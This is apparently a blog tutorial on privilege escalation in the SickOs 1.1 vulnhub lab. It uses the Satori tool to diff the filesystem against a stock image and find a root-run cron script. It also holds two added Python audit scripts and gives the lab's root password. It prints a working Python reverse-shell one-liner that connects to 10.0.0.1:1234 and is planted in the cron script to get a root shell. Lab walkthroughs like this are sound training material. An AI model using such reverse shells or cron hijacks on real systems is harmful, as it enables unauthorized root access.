
I came across a blog post while researching Linux privilege escalation techniques. The tool that the post covered was a mysterious pentesting tool I had never heard of before. This is how to use Satori for easy Linux privilege escalation. I plan on adding future target scenarios, but for now I will use SickOs v. 1.1 from vulnhub. I chose it because you need to open an SSH client connection to the target and I already know the root credentials for this one.

Want to own SickOs 1.1? Do it by going over my tutorial for SickOs 1.1 Vulnhub Walkthrough.

How It Works

Satori comes with three different tools that complement each other. The way I explain it is that the three are the Imager, the Browser, and the Differ. There is also a Remote, but really it is the Imager run over SSH. But why? Most of the CTF-style vulnerable machines that you can download and exploit run Linux, which makes sense given that it is open source. What that means is that escalating privileges on a vulnerable machine will more than likely happen in the context of Linux permissions. In order to hide or intentionally create insecure configurations, the creator of these machines makes changes that are clearly different from the standard operating system image. Should be easy to see the difference, right? Wrong. That is why Satori is so unique: it leverages a robust set of Python scripts to highlight these changes so that you don’t have to hunt for them.

Here’s What You Need

  • Get the repo from Github for Satori
  • Kali Linux Virtual Machine (VirtualBox)
  • SickOs Virtual Machine from Vulnhub (VirtualBox)

Getting Started

Follow the installation directions to install Satori and let’s get started.

cd satori-master
python setup.py install
pip install scpclient

To use Satori you need an SSH client connection, and vulnhub is the perfect match for this single use. What Satori does is hash the remote filesystem and then compare it to the default filesystem of a typical Linux build. It then outputs the notable differences, highlighting the changes that have been made to the system, to aid in exploiting misconfigurations.
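To make the imager/differ idea concrete, here is an added example of my own (not Satori’s code or its on-disk format): it hashes every regular file under a directory together with its mode and owner, then diffs two such snapshots and reports findings in the same spirit as Satori’s output. The demo builds a constructed baseline and a copy with one extra /etc/cron.d entry; the file names and the /opt/example/job.sh path are placeholders.

```python
import hashlib
import os
import stat
import tempfile


def image_tree(root):
    """Record sha256, permission bits and owner uid of each regular file under root (constructed imager)."""
    snapshot = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):  # skip symlinks, sockets, devices
                continue
            with open(path, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            rel = "/" + os.path.relpath(path, root)  # path as it appears inside the image
            snapshot[rel] = {"sha256": digest, "mode": stat.S_IMODE(st.st_mode), "uid": st.st_uid}
    return snapshot

def differ(original, captured, prefix="/"):
    """List files under prefix that were added, removed or changed between two images."""
    findings = []
    for path in sorted(set(original) | set(captured)):
        if not path.startswith(prefix):
            continue
        if path not in original:
            findings.append(f"[EXISTENCE] File '{path}' is not existent in the original image.")
        elif path not in captured:
            findings.append(f"[EXISTENCE] File '{path}' is not existent in the captured image.")
        else:
            o, c = original[path], captured[path]
            if o["sha256"] != c["sha256"]:
                findings.append(f"[HASH] File '{path}' differs from the original image.")
            if o["mode"] != c["mode"]:
                findings.append(f"[MODE] File '{path}' mode changed {o['mode']:04o} -> {c['mode']:04o}.")
    return findings

def demo():
    """Constructed baseline vs. a copy with one extra cron.d entry; diff only /etc/cron.d."""
    with tempfile.TemporaryDirectory() as base, tempfile.TemporaryDirectory() as live:
        for root in (base, live):
            os.makedirs(os.path.join(root, "etc/cron.d"))
            with open(os.path.join(root, "etc/cron.d/php5"), "w") as fh:
                fh.write("# constructed stock entry\n")
        with open(os.path.join(live, "etc/cron.d/automate"), "w") as fh:  # added by the box author
            fh.write("* * * * * root /opt/example/job.sh\n")  # placeholder script path
        return differ(image_tree(base), image_tree(live), "/etc/cron.d")
```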

Satori means “understanding” in Japanese.

The remote target I will use for this tutorial is vulnhub’s SickOs 1.1, and I will open an SSH session using the root user’s credentials for the virtual machine. Spoilers!!! Yes, the infosec folks are extremely sensitive when it comes to spoilers and giving away details to those learning, but I really don’t care. The password is ‘john@123’.

One of the things similar posts fail to mention is that the repo doesn’t work out of the box. You have to rename a few files to get them to work. These are the changes to make:

cp satori_imager.py satori-imager.py
cp satori_remote.py satori-remote.py
cp satori_differ.py satori-differ.py

Image the Remote Machine

Now to run Satori on the remote system. To do so run the Satori script like so, with your sickos credentials nearby.

python satori-remote.py root@<SickOs IP> --v --argument 'hash --threads 4 -v'

Satori imager will run and output the results to a gzipped file.

Differ the Before and After

Now that Satori has taken a snapshot of the current remote image (the one I have low-level user access to and opened a connection back to my Kali instance via ssh), the next step is ready. Satori needs two different images: the captured snapshot of the remote host and the standard image for the operating system. The latter has (you guessed it) also been run through the Satori imager.

It would be great if someone had already run some of these popular Linux images through the imager, right? Luckily github.com/operatorequals already has; get them from his Github repo. Here is how it goes: python satori-differ.py <standard image gzip> <remote captured image gzip>.

python satori-differ.py Linux-4.4.0-31-generic-i686-with-Ubuntu-14.04-trusty_HASH.jsn.gz hash.jsn.gz /directory-to-differ/

The output is pretty amazing; there are so many changes. Some grepping can be done to remove basic files that we have no interest in. Do this with grep -v "word(s) to ignore".

[EXISTENCE] File '/etc/init.d/mysql' is not existent in the original image.
[EXISTENCE] File '/etc/init.d/squid3' is not existent in the original image.
[EXISTENCE] File '/etc/init.d/udev-finish' is not existent in the original image.
[EXISTENCE] File '/etc/init.d/stop-bootlogd' is not existent in the original image.
[EXISTENCE] File '/etc/init.d/hostname' is not existent in the original image.
[EXISTENCE] File '/etc/init.d/apache2' is not existent in the original image.

Looking at a common exploit avenue, cron jobs, we see some irregularity in the new image’s configuration. I am looking for any scripts that are set to run where, by chance, the owner of the script is root.

python satori-differ.py ./Linux-4.4.0-31-generic-i686-with-Ubuntu-14.04-trusty_HASH.jsn.gz ./hash.jsn.gz -v /etc/ | grep "cron.d"
[EXISTENCE] File '/etc/cron.d/php5' is not existent in the original image.
[EXISTENCE] File '/etc/cron.d/automate' is not existent in the original image.
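The check I am doing by eye above, written out as an added audit script of my own (not Satori’s code): it parses /etc/cron.d entries, keeps those that run as root, and flags any whose script is not owned by the privileged user or is writable by group or others, which is the misconfiguration a defender should fix. The demo directory, the php5 and automate entry names and the cleanup.sh/job.sh scripts are constructed; since files created in a test run belong to the current user, the demo passes os.getuid() as the expected owner.

```python
import os
import re
import stat
import tempfile

# /etc/cron.d lines carry a user field: minute hour dom month dow user command
CRON_D_LINE = re.compile(r"^\s*(?:\S+\s+){5}(?P<user>\S+)\s+(?P<command>.+)$")


def first_path(command):
    """Return the first absolute path in a cron command, i.e. the script it launches."""
    for token in command.split():
        if token.startswith("/"):
            return token
    return None

def audit_cron_d(cron_dir, privileged_uid=0):
    """Flag jobs that run as root but launch a script not owned by privileged_uid or
    writable by group/others: a low-privilege user could then edit what root executes."""
    findings = []
    for name in sorted(os.listdir(cron_dir)):
        with open(os.path.join(cron_dir, name)) as fh:
            for line in fh:
                if line.lstrip().startswith("#"):
                    continue
                m = CRON_D_LINE.match(line)
                if not m or m.group("user") != "root":
                    continue
                script = first_path(m.group("command"))
                if script is None or not os.path.isfile(script):
                    continue
                st = os.stat(script)
                loose = st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)
                if st.st_uid != privileged_uid or loose:
                    findings.append((name, script, oct(stat.S_IMODE(st.st_mode))))
    return findings

def demo():
    """Constructed cron.d with one sound entry and one world-writable root job."""
    with tempfile.TemporaryDirectory() as tmp:
        cron_dir = os.path.join(tmp, "cron.d")
        os.mkdir(cron_dir)
        for script, mode, entry in (("cleanup.sh", 0o755, "php5"), ("job.sh", 0o777, "automate")):
            path = os.path.join(tmp, script)
            with open(path, "w") as fh:
                fh.write("#!/bin/sh\n")
            os.chmod(path, mode)
            with open(os.path.join(cron_dir, entry), "w") as fh:
                fh.write(f"* * * * * root {path}\n")
        # files we just made are owned by the current user, so treat that uid as "root" here
        return audit_cron_d(cron_dir, privileged_uid=os.getuid())
```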

Escalate Privileges

Exploring the newly created automate file found in the altered /etc/cron.d directory, the results are very promising. (Compare how long this took with wandering around the filesystem at a whim.) Satori clearly is a heavy contender for pentesting tool of the year.

Now I rely on a reverse shell one-liner from Pentestmonkey (my go-to for one-liners) and use the following to get a shell back, this time as *root*.

Here’s a quick vim lesson: launch vi and move to the line you want to edit. Once you arrive, hit a to start editing, and when you are done hit Esc followed by :wq to save and exit.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

After removing the python -c part and the surrounding quotation marks, I wait and I wait… So instead I give it a push and set off the Python script myself. With my netcat listener open I wait again. Finally I get my new shell, and I am now root.

Satori Browser

I couldn’t end without trying out the Browser. The best way to describe this tool is to think of it as mounting the file system of the SickOs machine, but doing so locally in Kali.

python satori_browser.py hash.jsn.gz

I load the image using browser and I am able to move around and list the contents that I want to see.
